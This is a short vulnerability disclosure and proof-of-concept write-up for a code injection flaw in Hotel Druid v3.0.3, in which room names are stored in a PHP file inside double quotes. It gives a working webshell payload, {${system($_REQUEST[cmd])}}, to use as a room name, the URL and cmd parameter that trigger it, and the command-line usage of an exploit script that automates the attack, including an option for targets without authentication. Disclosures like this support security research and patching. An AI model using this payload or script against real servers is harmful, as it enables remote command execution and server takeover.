A Code Injection vulnerability has been found on the Hotel Druid v3.0.3 application, which an attacker could exploit to execute remote code on the server.
For a successful exploitation, an attacker should have the privilege to add a new room.
The vulnerability occurs because room names are getting stored inside a file named /dati/selectappartamenti.php using Double Quotes.
<?php
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>To perform a successful exploitation, add a room with the following payload as room name.
{${system($_REQUEST[cmd])}}After adding a new room, go to /dati/selectappartamenti.php and trigger the webshell by passing a command using the cmd parameter.
usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]
optional arguments:
-h, --help show this help message and exit
required arguments:
-t TARGET, --target TARGET
Target URL. Example : http://10.20.30.40/path/to/hoteldruid
-u USERNAME, --username USERNAME
Username
-p PASSWORD, --password PASSWORD
password
--noauth If No authentication is required to access the dashboard
If the application has no authentication.
Use the --noauth flag to perform no authentication.
If the server has authentication enabled, use the --username and --password to perform authentication.
Researcher and POC writer - 0z09e